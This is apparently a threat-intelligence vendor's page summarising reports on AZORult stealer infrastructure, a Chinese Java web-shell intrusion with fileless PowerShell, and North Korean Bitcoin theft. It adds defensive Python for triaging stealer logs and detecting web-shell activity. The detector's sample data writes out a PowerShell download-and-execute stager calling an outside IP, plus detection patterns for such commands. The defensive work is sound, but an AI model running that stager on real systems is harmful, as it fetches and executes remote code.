Cyber threat topics written by top analysts
Intelligence isn’t network data, indicators of compromise, or forensics. Intelligence isn’t derived by machines; it is derived by humans analyzing all of that data to give information security professionals accurate, contextual information on which they base workplans and strategy and allocate money and people.
Get access to all the best cyber intelligence stories. Share them with your managers, or others who might be interested. They’re all based on work our security professionals are doing in the lab. Price $375 Per Year
AZORult is a publicly available information-stealing malware that is popular among hackers. It is delivered via phishing e-mails and exploit kits (EKs), most notably the Rig EK, and harvests credentials by targeting a variety of applications on the victim host. In January 2018, Wapack Labs began analyzing AZORult nodes in an effort to identify stolen data. As part of this research, Wapack Labs gained insight into AZORult command-and-control (C2) infrastructure. This report includes details on the AZORult malware and provides trending data on the identified infrastructure. Wapack Labs analysts were able to recover over a million AZORult logs, which include victim IPs, e-mails, credentials, and attack server data. This information is listed in the Wapack Labs Blacklist Slack channel and is searchable via our CTAC tool to provide situational awareness.
Wapack Labs has cataloged and reported on AZORult malware in the past. An archive of related reporting can be found in the Red Sky Alliance portal.
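The practical use of recovered stealer logs is the exposure check the abstract alludes to: does any record touch our organisation? The script below is an added example, not code from the Wapack Labs report or the CTAC tool. It assumes the dump has already been normalised into one record per credential (victim IP, target URL, username), and the monitored domains, address ranges and sample records are constructed for illustration. It matches on three independent axes, because a record can matter even when the victim is not one of our machines: an employee identity used on a third-party site, or an outside user's credential for one of our own portals.

```python
"""Check recovered stealer-log records for exposure of an organisation.

Added example, not code from the Wapack Labs report or the CTAC tool.  The record
shape, the monitored domains/ranges and the sample records are all assumptions.
"""
import ipaddress
from urllib.parse import urlsplit

# Assumed watchlist: the organisation's mail domains and public address space.
MONITORED_DOMAINS = {"example.com"}
MONITORED_NETS = [ipaddress.ip_network(n) for n in ("203.0.113.0/24", "2001:db8::/32")]


def domain_monitored(host: str) -> bool:
    """True for a monitored domain or any subdomain of it (case-insensitive)."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in MONITORED_DOMAINS)


def exposure_reasons(rec: dict) -> list:
    """Return why this record matters to us, on three independent axes:
    the victim sits in our address space, the account is one of our identities,
    or the credential unlocks one of our services (a customer/partner logging in)."""
    reasons = []
    try:
        ip = ipaddress.ip_address(rec.get("victim_ip", ""))
    except ValueError:
        ip = None  # stealer logs often carry junk or no IP; do not fail the record
    if ip is not None and any(ip in net for net in MONITORED_NETS):
        reasons.append(f"victim {ip} in monitored range")
    user = rec.get("username", "").strip().lower()
    if "@" in user and domain_monitored(user.rsplit("@", 1)[1]):
        reasons.append(f"account {user} on monitored domain")
    host = urlsplit(rec.get("url", "")).hostname or ""
    if domain_monitored(host):
        reasons.append(f"credential for monitored service {host}")
    return reasons


def triage(records: list) -> list:
    """Records that touch the organisation, each paired with its reasons."""
    hits = []
    for rec in records:
        reasons = exposure_reasons(rec)
        if reasons:
            hits.append((rec, reasons))
    return hits


# Constructed sample records (not real victim data), already normalised from
# the per-victim files a stealer log dump contains.
SAMPLE_RECORDS = [
    {"victim_ip": "203.0.113.45", "url": "https://mail.provider.test/login",
     "username": "jdoe@gmail.test", "password": "..."},          # our network, personal account
    {"victim_ip": "198.51.100.9", "url": "https://shop.other.test/account",
     "username": "Alice.Smith@Example.com", "password": "..."},   # our identity, elsewhere
    {"victim_ip": "198.51.100.77", "url": "https://vpn.example.com/",
     "username": "contractor42", "password": "..."},              # our service, outside user
    {"victim_ip": "unknown", "url": "https://forum.other.test/",
     "username": "gamer99", "password": "..."},                   # nothing to do with us
]

if __name__ == "__main__":
    for rec, reasons in triage(SAMPLE_RECORDS):
        print(rec["username"], "->", "; ".join(reasons))
```

The third sample record is the one most teams miss: the victim machine and account belong to someone else, but the credential opens a door into our environment, so it should trigger a reset on the service side just as an employee hit would.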
Chinese nation-state attackers (high confidence) recently used a Java web shell (Chropper.java) against a corporate network’s external web server to download an unidentified malware payload. The initial breach of the server occurred on 15 December 2017, likely leveraging a ColdFusion exploit. On 18 December 2017, the attackers deployed a modified version of the web shell, taken from a large collection of popular Chinese web shells uploaded to GitHub by a user who follows well-known Chinese security researchers. The attack sequence took place from 19 to 21 December 2017 and was detected on the 21st. Once connected, the attackers executed a PowerShell script that launched a payload which was never written to disk. The payload established persistence, injected into legitimate Windows processes, and enumerated all drive letters from C to Z to identify the mapped drives on the server.
Wapack Labs has cataloged and reported on data exfiltration methods in the past. An archive of related reporting can be found in the Red Sky Alliance portal.
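The chain above leaves a small number of observable seams even though the payload never touches disk: a server-side script written under the web root by the web server process, a command shell whose parent is the web server, and a PowerShell launch with an encoded command that decodes to download-and-execute-in-memory logic. The script below is an added example, not code from the Wapack Labs report; it runs three such rules over Sysmon-style process-creation and file-creation events. The event field names, the list of web server process names (ColdFusion runs inside a JVM, so java.exe is the expected parent) and the sample events, including the base64 stager, are constructed assumptions to be mapped onto your own telemetry.

```python
"""Hunt for the web-shell-to-fileless-PowerShell chain over Sysmon-style events.

Added example, not from the Wapack Labs report.  Event shape, process names and
the sample data below are assumptions; map the fields to your own log pipeline.
"""
import base64
import ntpath
import re
from dataclasses import dataclass

# Assumed process names for the web tier on a ColdFusion/IIS host.  ColdFusion runs
# inside a JVM, so java.exe (or the service wrapper) is the parent of anything the
# web shell executes; tune this set for your environment.
WEB_SERVER_IMAGES = {"coldfusion.exe", "java.exe", "jrun.exe", "w3wp.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Server-side script extensions a web shell would use on such a host.
WEBSHELL_EXTS = (".cfm", ".cfml", ".cfc", ".jsp", ".jspx", ".java", ".aspx", ".ashx")

# Command-line markers of download-and-execute-in-memory PowerShell.
FILELESS_MARKERS = [re.compile(p, re.IGNORECASE) for p in (
    r"\bIEX\b", r"Invoke-Expression", r"DownloadString", r"DownloadData",
    r"FromBase64String", r"\[Reflection\.Assembly\]::Load", r"-nop\b",
    r"-w(?:indowstyle)?\s+hidden",
    r"\b67\.\.90\b",  # ASCII range C..Z: drive-letter enumeration written in script
)]
ENCODED_FLAG = re.compile(
    r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


@dataclass
class Alert:
    rule: str
    ts: str
    host: str
    detail: str


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries base64 of UTF-16LE script text; "" if it is not."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def encode_command(script: str) -> str:
    """Inverse of the above; used only to build the constructed sample below."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def detect(events: list) -> list:
    alerts = []
    for ev in events:
        image = ntpath.basename(ev.get("image", "")).lower()
        if ev["type"] == "FileCreate":
            # Web server process writing a server-side script: web shell drop.
            if image in WEB_SERVER_IMAGES and ev["target"].lower().endswith(WEBSHELL_EXTS):
                alerts.append(Alert("webshell_file_drop", ev["ts"], ev["host"], ev["target"]))
        elif ev["type"] == "ProcessCreate":
            parent = ntpath.basename(ev.get("parent_image", "")).lower()
            if parent in WEB_SERVER_IMAGES and image in SHELL_IMAGES:
                alerts.append(Alert("web_server_spawned_shell", ev["ts"], ev["host"],
                                    f"{parent} -> {image}: {ev['cmdline']}"))
            if image in ("powershell.exe", "pwsh.exe"):
                cmdline = ev["cmdline"]
                m = ENCODED_FLAG.search(cmdline)
                decoded = decode_encoded_command(m.group(1)) if m else ""
                hits = [p.pattern for p in FILELESS_MARKERS
                        if p.search(cmdline) or (decoded and p.search(decoded))]
                if m or hits:
                    detail = "; ".join(hits) + (f" | decoded: {decoded}" if decoded else "")
                    alerts.append(Alert("fileless_powershell", ev["ts"], ev["host"], detail))
    return alerts


# Constructed sample events (not real telemetry), shaped like Sysmon EID 11 / EID 1.
STAGER = ("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage');"
          " 67..90 | % { [char]$_ + ':\\' } | ? { Test-Path $_ }")
SAMPLE_EVENTS = [
    {"type": "ProcessCreate", "ts": "2017-12-19T02:11:03Z", "host": "WEB01",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\ops\backup.ps1"},  # benign
    {"type": "FileCreate", "ts": "2017-12-18T21:40:12Z", "host": "WEB01",
     "image": r"C:\ColdFusion2016\jre\bin\java.exe",
     "target": r"C:\inetpub\wwwroot\CFIDE\scripts\cfupdate.cfm"},
    {"type": "ProcessCreate", "ts": "2017-12-19T02:14:55Z", "host": "WEB01",
     "parent_image": r"C:\ColdFusion2016\jre\bin\java.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell -nop -w hidden -enc " + encode_command(STAGER)},
    {"type": "ProcessCreate", "ts": "2017-12-19T02:14:56Z", "host": "WEB01",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -enc " + encode_command(STAGER)},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a.ts, a.host, a.rule, a.detail)
```

The drive-letter marker only fires when the enumeration is written in script text; a payload that calls the Windows API from injected memory, as described above, leaves no command line to match, which is why the parent-child rule on the web server process is the one to rely on. The encoded-command decode matters because the IEX and DownloadString markers live inside the base64 and are invisible to a rule that only reads the raw command line.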
North Korea has been identified as conducting multiple thefts of Bitcoin in 2017. Together with its identification as the actor behind the Wannacry ransomware, which was also an attempt to acquire Bitcoin, and limited evidence of Bitcoin mining, these actions indicate that a major North Korean campaign is underway to acquire Bitcoin as a way to raise hard currency. North Korea was likely motivated to acquire Bitcoin by any means because of the currency’s rapidly increasing value in 2017, the possibility of hiding the thefts by converting Bitcoin into more obscure cryptocurrencies, and the convertibility of Bitcoin and those other cryptocurrencies into hard currency. While it is unusual for a nation-state to be involved in this type of theft, it is not much different from other North Korean criminal enterprises, which have included cyber bank robbery, illegal weapons sales, and counterfeiting of U.S. currency.
Wapack Labs has cataloged and reported on North Korean cyber activity in the past. An archive of related reporting can be found in the Red Sky Alliance portal.
Wapack Labs has cataloged and reported on APT activity and watering-hole attacks in the past. An archive of related reporting can be found in the Red Sky Alliance portal.
This report encapsulates our predictions regarding the most significant cyber threats and vulnerabilities for 2018.
- Phishing: Will likely become more popular among novice and criminal hackers.
- Account Targeting: Account credentials are increasingly available.
- Democratization of Cyber Weapons: 2017 saw the most high-profile ransomware attack to date with the Wannacry worm.
- Tor Network: 2018 will be the year of fighting, and winning, against abuse of the Tor network.
- Macro Malware: The popularity of malicious macros for malware delivery remained strong in 2017.
- Geopolitical Tensions: Iran and North Korea tensions continue.
- Blockchain-related Cybercrime: With the establishment of Bitcoin futures and growing general interest in blockchain technologies, exploitation in this field will grow too...
Wapack Labs has cataloged and reported on cyber threats and vulnerabilities in the past. An archive of related reporting can be found in the Red Sky Alliance portal.